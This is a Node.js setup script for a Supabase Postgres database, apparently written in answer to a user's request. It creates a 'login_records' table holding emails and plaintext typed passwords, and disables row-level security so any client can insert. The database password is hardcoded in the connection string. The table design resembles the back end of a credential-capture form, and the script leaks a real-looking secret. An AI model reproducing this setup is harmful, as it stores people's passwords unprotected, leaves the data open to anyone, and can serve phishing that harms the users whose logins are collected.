const { Client } = require('pg');

async function createFolder() {
  const connectionString = 'postgresql://postgres:akusukamakan@db.afyapcfsfpfyupowlxzc.supabase.co:5432/postgres';
  
  const client = new Client({ connectionString });

  try {
    await client.connect();
    console.log("Connected to Supabase DB!");
    
    // Create the "folder" (table) the user requested
    await client.query(`
      CREATE TABLE IF NOT EXISTS public.login_records (
        id bigint generated by default as identity primary key,
        email text,
        password_input text,
        action_type text,
        created_at timestamp with time zone default timezone('utc'::text, now()) not null
      );
    `);
    console.log("Table 'login_records' created.");

    // Disable RLS so the client can insert easily without policies
    await client.query(`
      ALTER TABLE public.login_records DISABLE ROW LEVEL SECURITY;
    `);
    console.log("RLS disabled for login_records.");

  } catch (err) {
    console.error("Error setting up DB:", err);
  } finally {
    await client.end();
  }
}

createFolder();
